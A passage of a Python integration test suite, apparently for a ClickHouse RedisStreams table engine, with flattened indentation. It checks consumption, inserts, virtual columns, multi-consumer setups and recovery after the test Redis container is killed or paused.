deadline = time.monotonic() + time_limit_sec
while time.monotonic() < deadline:
result = instance.query("SELECT * FROM test.view2 ORDER BY key")
if redis_check_result(result):
break
redis_check_result(result, True)
connection.close()
def test_redis_materialized_view_with_subquery(redis_cluster):
stream_name = 'mvsq'
group_name = 'test_mvsq'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.redis);
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
while True:
result = instance.query("SELECT * FROM test.view ORDER BY key")
if redis_check_result(result):
break
connection.close()
redis_check_result(result, True)
def test_redis_many_materialized_views(redis_cluster):
stream_name = 'mmv'
group_name = 'test_mmv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = 1;
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.redis;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.redis;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
while True:
result1 = instance.query("SELECT * FROM test.view1 ORDER BY key")
result2 = instance.query("SELECT * FROM test.view2 ORDER BY key")
if redis_check_result(result1) and redis_check_result(result2):
break
instance.query(
"""
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
"""
)
connection.close()
redis_check_result(result1, True)
redis_check_result(result2, True)
def test_redis_big_message(redis_cluster):
# Create messages of size ~100Kb
redis_messages = 1000
batch_size = 1000
messages = [
{"key": i, "value": "x" * 100 * batch_size}
for i in range(redis_messages)
]
stream_name = 'big'
group_name = 'test_big'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value String)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for message in messages:
connection.xadd(stream_name, message)
while True:
result = instance.query("SELECT count() FROM test.view")
if int(result) == redis_messages:
break
connection.close()
assert (
int(result) == redis_messages
), "ClickHouse lost some messages: {}".format(result)
def test_redis_multiple_streams_and_consumers(redis_cluster):
NUM_STREAMS = 10
NUM_CONSUMERS = 10
streams = []
group_name = 'test_multiple'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('multiple_{}'.format(i))
connection.xgroup_create(streams[-1], group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = {};
CREATE TABLE test.view (key UInt64, value UInt64, stream_id String)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _stream AS stream_id FROM test.redis;
""".format(
redis_cluster.redis_host,
','.join(streams),
group_name,
NUM_CONSUMERS
)
)
i = [0]
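    # i is a one-element list so the nested produce() threads can mutate the shared counter
    # (a bare int would be rebound locally); the increments are not synchronized, and the
    # assertions only look at the total row count and distinct stream ids.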
messages_num = 10000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = NUM_STREAMS * 2
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result1 = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT stream_id) FROM test.view")
for thread in threads:
thread.join()
assert (
int(result1) == messages_num * threads_num
), "ClickHouse lost some messages"
assert int(result2) == 10
def test_redis_mv_combo(redis_cluster):
NUM_STREAMS = 2
NUM_CONSUMERS = 5
NUM_MV = 5
streams = []
group_name = 'test_combo'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('combo_{}'.format(i))
connection.xgroup_create(streams[-1], group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = {};
""".format(
redis_cluster.redis_host,
','.join(streams),
group_name,
NUM_CONSUMERS
)
)
query = ""
for mv_id in range(NUM_MV):
query += """
DROP TABLE IF EXISTS test.combo_{0};
DROP TABLE IF EXISTS test.combo_{0}_mv;
CREATE TABLE test.combo_{0} (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.combo_{0}_mv TO test.combo_{0} AS
SELECT * FROM test.redis;
""".format(
mv_id
)
instance.query(query)
time.sleep(2)
for mv_id in range(NUM_MV):
instance.query("SELECT count() FROM test.combo_{0}".format(mv_id))
i = [0]
messages_num = 10000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = NUM_STREAMS * 5
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
for _ in range(20):
result = 0
for mv_id in range(NUM_MV):
num = int(
instance.query("SELECT count() FROM test.combo_{0}".format(mv_id))
)
logging.warning(str(num) + '\n')
result += num
if int(result) == messages_num * threads_num * NUM_MV:
break
time.sleep(1)
for thread in threads:
thread.join()
for mv_id in range(NUM_MV):
instance.query(
"""
DROP TABLE test.combo_{0}_mv;
DROP TABLE test.combo_{0};
""".format(
mv_id
)
)
assert (
int(result) == messages_num * threads_num * NUM_MV
), "ClickHouse lost some messages: {}".format(result)
def test_redis_insert(redis_cluster):
stream_name = 'insert'
group_name = 'test_insert'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
while True:
try:
instance.query("INSERT INTO test.redis VALUES {}".format(values))
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
while True:
insert_messages = connection.xread({stream_name: "0-0"}, count=50)
# xread returns list of lists of topics and messages - select first topic and its messages
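        # Illustrative shape of the reply (assuming redis-py's xread return format):
        #   [[b'insert', [(b'1-0', {b'key': b'0', b'value': b'0'}), ...]]]
        # i.e. a list of (stream, entries) pairs, each entry being (entry_id, field_dict).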
insert_messages = insert_messages[0][1]
logging.warning(insert_messages)
if len(insert_messages) == 50:
break
result = "\n".join(map(lambda x: x[1]["key".encode()].decode() + "\t" + x[1]["value".encode()].decode(), insert_messages))
redis_check_result(result, True)
def test_redis_insert_into_table_with_many_streams_wrong(redis_cluster):
stream_names = ['insert_many_streams_wrong1', 'insert_many_streams_wrong2']
group_name = 'test_insert_many_streams_wrong'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for stream_name in stream_names:
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
','.join(stream_names),
group_name
)
)
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
instance.query_and_get_error("INSERT INTO test.redis VALUES {}".format(values))
def test_redis_insert_into_table_with_many_streams_right(redis_cluster):
stream_names = ['insert_many_streams_right1', 'insert_many_streams_right2']
group_name = 'test_insert_many_streams_right'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for stream_name in stream_names:
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
','.join(stream_names),
group_name
)
)
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
while True:
try:
instance.query("INSERT INTO test.redis SETTINGS stream_like_engine_insert_queue = 'insert_many_stream_rights1' VALUES {}".format(values))
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
while True:
        insert_messages = connection.xread({'insert_many_streams_right1': "0-0"}, count=50)
# xread returns list of lists of topics and messages - select first topic and its messages
insert_messages = insert_messages[0][1]
if len(insert_messages) == 50:
break
result = "\n".join(
map(lambda x: x[1]["key".encode()].decode() + "\t" + x[1]["value".encode()].decode(), insert_messages))
redis_check_result(result, True)
def test_redis_many_inserts(redis_cluster):
stream_name = 'many_inserts'
group_name = 'test_many_inserts'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.redis_many;
DROP TABLE IF EXISTS test.redis_consume;
DROP TABLE IF EXISTS test.view_many;
DROP TABLE IF EXISTS test.consumer_many;
CREATE TABLE test.redis_many (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}:6379',
redis_stream_list = '{1}',
redis_group_name = '{2}';
CREATE TABLE test.redis_consume (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}:6379',
redis_stream_list = '{1}',
redis_group_name = '{2}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages_num = 10000
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
def insert():
while True:
try:
instance.query(
"INSERT INTO test.redis_many VALUES {}".format(values)
)
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query(
"""
CREATE TABLE test.view_many (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer_many TO test.view_many AS
SELECT * FROM test.redis_consume;
"""
)
for thread in threads:
thread.join()
while True:
result = instance.query("SELECT count() FROM test.view_many")
print(result, messages_num * threads_num)
if int(result) == messages_num * threads_num:
break
time.sleep(1)
instance.query(
"""
DROP TABLE test.redis_consume;
DROP TABLE test.redis_many;
DROP TABLE test.consumer_many;
DROP TABLE test.view_many;
"""
)
assert (
int(result) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result)
def test_redis_overloaded_insert(redis_cluster):
stream_name = 'over'
group_name = 'test_over'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.view_overload;
DROP TABLE IF EXISTS test.consumer_overload;
DROP TABLE IF EXISTS test.redis_consume;
CREATE TABLE test.redis_consume (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}',
redis_stream_list = '{1}',
redis_num_consumers = 5,
redis_max_block_size = 10000,
redis_group_name = '{2}';
CREATE TABLE test.redis_overload (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}',
redis_stream_list = '{1}',
redis_group_name = '{2}';
CREATE TABLE test.view_overload (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_overload TO test.view_overload AS
SELECT * FROM test.redis_consume;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages_num = 100000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
while True:
try:
instance.query(
"INSERT INTO test.redis_overload VALUES {}".format(values)
)
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
threads = []
threads_num = 5
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query("SELECT count() FROM test.view_overload")
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query(
"""
DROP TABLE test.consumer_overload;
DROP TABLE test.view_overload;
DROP TABLE test.redis_consume;
DROP TABLE test.redis_overload;
"""
)
for thread in threads:
thread.join()
assert (
int(result) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result)
def test_redis_virtual_columns(redis_cluster):
stream_name = 'virtuals'
group_name = 'test_virtuals'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis_virtuals (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, key, _stream, _key, _timestamp, _sequence_number FROM test.redis_virtuals;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
message_num = 10
for i in range(message_num):
connection.xadd(stream_name, {"key": i, "value": i}, str(i + 1) + "-0")
while True:
result = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query(
"""
SELECT key, value, _stream, _key, _timestamp, _sequence_number
FROM test.view ORDER BY key
"""
)
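    # Expected layout (from the explicit entry ids "1-0".."10-0" added above): _stream is the
    # stream name, _key the full entry id, _timestamp the part of the id before the dash and
    # _sequence_number the part after it.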
expected = """\
0 0 virtuals 1-0 1 0
1 1 virtuals 2-0 2 0
2 2 virtuals 3-0 3 0
3 3 virtuals 4-0 4 0
4 4 virtuals 5-0 5 0
5 5 virtuals 6-0 6 0
6 6 virtuals 7-0 7 0
7 7 virtuals 8-0 8 0
8 8 virtuals 9-0 9 0
9 9 virtuals 10-0 10 0
"""
instance.query(
"""
DROP TABLE test.redis_virtuals;
DROP TABLE test.view;
"""
)
assert TSV(result) == TSV(expected)
def test_redis_virtual_columns_with_materialized_view(redis_cluster):
stream_name = 'virtuals_mv'
group_name = 'test_virtuals_mv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis_virtuals_mv (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64,
stream String, message_id String, timestamp UInt8, sequence_number UInt8) ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _stream as stream, _key as message_id, _timestamp as timestamp, _sequence_number as sequence_number
FROM test.redis_virtuals_mv;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
message_num = 10
for i in range(message_num):
connection.xadd(stream_name, {"key": i, "value": i}, str(i + 1) + "-0")
while True:
result = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query(
"SELECT key, value, stream, message_id, timestamp, sequence_number FROM test.view ORDER BY key"
)
expected = """\
0 0 virtuals_mv 1-0 1 0
1 1 virtuals_mv 2-0 2 0
2 2 virtuals_mv 3-0 3 0
3 3 virtuals_mv 4-0 4 0
4 4 virtuals_mv 5-0 5 0
5 5 virtuals_mv 6-0 6 0
6 6 virtuals_mv 7-0 7 0
7 7 virtuals_mv 8-0 8 0
8 8 virtuals_mv 9-0 9 0
9 9 virtuals_mv 10-0 10 0
"""
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.view;
DROP TABLE test.redis_virtuals_mv
"""
)
assert TSV(result) == TSV(expected)
def test_redis_many_consumers_to_each_stream(redis_cluster):
NUM_STREAMS = 2
NUM_TABLES = 4
streams = []
group_name = 'test_many_consumers'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('many_consumers_{}'.format(i))
for stream in streams:
connection.xgroup_create(stream, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, consumer_id String)
ENGINE = MergeTree()
ORDER BY key;
"""
)
query = ""
for table_id in range(NUM_TABLES):
query += """
DROP TABLE IF EXISTS test.many_consumers_{0};
DROP TABLE IF EXISTS test.many_consumers_{0}_mv;
CREATE TABLE test.many_consumers_{0} (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{1}:6379',
redis_stream_list = '{2}',
redis_group_name = '{3}',
redis_num_consumers = 2,
redis_max_block_size = 500;
CREATE MATERIALIZED VIEW test.many_consumers_{0}_mv TO test.destination AS
SELECT key, value, _consumer AS consumer_id FROM test.many_consumers_{0};
""".format(
table_id,
redis_cluster.redis_host,
','.join(streams),
group_name,
)
instance.query(query)
i = [0]
messages_num = 5000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = 5 * NUM_STREAMS
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result1 = instance.query("SELECT count() FROM test.destination")
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT consumer_id) FROM test.destination")
for thread in threads:
thread.join()
for consumer_id in range(NUM_TABLES):
instance.query(
"""
DROP TABLE test.many_consumers_{0};
DROP TABLE test.many_consumers_{0}_mv;
""".format(
consumer_id
)
)
instance.query(
"""
DROP TABLE test.destination;
"""
)
assert (
int(result1) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result1)
# 4 tables, 2 consumers for each table => 8 consumer tags
assert int(result2) == 8
def test_redis_many_consumers_with_threads_to_each_stream(redis_cluster):
NUM_STREAMS = 2
NUM_TABLES = 4
streams = []
group_name = 'test_many_consumers_with_threads'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('many_consumers_with_threads_{}'.format(i))
for stream in streams:
connection.xgroup_create(stream, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, consumer_id String)
ENGINE = MergeTree()
ORDER BY key;
"""
)
query = ""
for table_id in range(NUM_TABLES):
query += """
DROP TABLE IF EXISTS test.many_consumers_with_threads_{0};
DROP TABLE IF EXISTS test.many_consumers_with_threads_{0}_mv;
CREATE TABLE test.many_consumers_with_threads_{0} (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{1}:6379',
redis_stream_list = '{2}',
redis_group_name = '{3}',
redis_num_consumers = 2,
redis_thread_per_consumer = true;
CREATE MATERIALIZED VIEW test.many_consumers_with_threads_{0}_mv TO test.destination AS
SELECT key, value, _consumer AS consumer_id FROM test.many_consumers_with_threads_{0};
""".format(
table_id,
redis_cluster.redis_host,
','.join(streams),
group_name,
)
instance.query(query)
i = [0]
messages_num = 5000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = 5 * NUM_STREAMS
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result1 = instance.query("SELECT count() FROM test.destination")
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT consumer_id) FROM test.destination")
for thread in threads:
thread.join()
for consumer_id in range(NUM_TABLES):
instance.query(
"""
DROP TABLE test.many_consumers_with_threads_{0};
DROP TABLE test.many_consumers_with_threads_{0}_mv;
""".format(
consumer_id
)
)
instance.query(
"""
DROP TABLE test.destination;
"""
)
assert (
int(result1) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result1)
# 4 tables, 2 consumers for each table => 8 consumer tags
assert int(result2) == 8
def test_redis_restore_failed_connection_without_losses(redis_cluster):
stream_name = 'with_losses'
group_name = 'test_with_losses'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.consumer_reconnect (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = 10;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages_num = 150000
for i in range(messages_num):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
instance.query(
"""
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.consumer_reconnect;
"""
)
while int(instance.query("SELECT count() FROM test.view")) == 0:
time.sleep(0.1)
kill_redis(redis_cluster.redis_docker_id)
time.sleep(8)
revive_redis(redis_cluster.redis_docker_id)
while True:
result = instance.query("SELECT count(DISTINCT key) FROM test.view")
time.sleep(1)
if int(result) == messages_num:
break
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.consumer_reconnect;
"""
)
assert int(result) == messages_num, "ClickHouse lost some messages: {}".format(
result
)
def test_redis_no_connection_at_startup_1(redis_cluster):
# no connection when table is initialized
stream_name = 'cs'
group_name = 'test_cs'
redis_cluster.pause_container("redis1")
instance.query_and_get_error(
"""
CREATE TABLE test.cs (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
redis_cluster.unpause_container("redis1")
def test_redis_no_connection_at_startup_2(redis_cluster):
stream_name = 'no_connection'
group_name = 'test_no_connection'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.cs (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = '5';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.cs;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
instance.query("DETACH TABLE test.cs")
redis_cluster.pause_container("redis1")
instance.query("ATTACH TABLE test.cs")
redis_cluster.unpause_container("redis1")
messages_num = 1000
for i in range(messages_num):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
while True:
result = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result) == messages_num:
break
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.cs;
"""
)
assert int(result) == messages_num, "ClickHouse lost some messages: {}".format(
result
)
def test_redis_json_format_factory_settings(redis_cluster):
stream_name = 'format_settings'
group_name = 'test_format_settings'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.format_settings (
id String, date DateTime
) ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
date_time_input_format = 'best_effort';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.xadd(stream_name, {"id": "format_settings_test", "date": "2021-01-19T14:42:33.1829214Z"})
expected = instance.query(
"""SELECT parseDateTimeBestEffort(CAST('2021-01-19T14:42:33.1829214Z', 'String'))"""
)
result = ""
while True:
result = instance.query("SELECT date FROM test.format_settings")
if result == expected:
break
instance.query(
"""
CREATE TABLE test.view (
id String, date DateTime
) ENGINE = MergeTree ORDER BY id;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.format_settings;
"""
)
connection.xadd(stream_name, {"id": "format_settings_test", "date": "2021-01-19T14:42:33.1829214Z"})
result = ""
while True:
result = instance.query("SELECT date FROM test.view")
if result == expected:
break
connection.close()
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.format_settings;
"""
)
assert result == expected
def test_redis_manage_groups_properly(redis_cluster):
stream_name = 'manage_groups'
group_name = 'test_manage_groups'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
instance.query(
"""
CREATE TABLE test.redis_drop (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_manage_consumer_groups = true;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.xadd(stream_name, {"key": 1, "value": 2})
while True:
result = instance.query(
"SELECT * FROM test.redis_drop ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
exists = False
try:
connection.xgroup_create(stream_name, group_name, '$')
except Exception as e:
exists = "BUSYGROUP" in str(e)
assert exists
instance.query("DROP TABLE test.redis_drop")
time.sleep(10)
try:
connection.xgroup_create(stream_name, group_name, '$')
exists = False
    except Exception:
exists = True
assert not exists
def test_redis_consume_stream(redis_cluster):
stream_name = 'consume_stream'
group_name = 'test_consume_stream'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
i = [0]
messages_num = 1000
def produce():
for _ in range(messages_num):
connection.xadd(stream_name, {"key": i[0], "value": i[0]})
i[0] += 1
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query(
"""
CREATE TABLE test.redis_stream (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_manage_consumer_groups = true,
redis_consumer_groups_start_id = '0-0';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis_stream;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
result = ""
while True:
result = instance.query("SELECT count() FROM test.view")
if int(result) == messages_num * threads_num:
break
time.sleep(1)
for thread in threads:
thread.join()
instance.query("DROP TABLE test.redis_stream")
def test_redis_bad_args(redis_cluster):
instance.query_and_get_error(
"""
CREATE TABLE test.drop (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = 'redis1:6379',
redis_stream_list = 'f',
redis_manage_consumer_groups = true,
redis_consumer_groups_start_id = '0-0';
"""
)
def test_redis_drop_mv(redis_cluster):
stream_name = 'drop_mv'
group_name = 'test_drop_mv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages = []
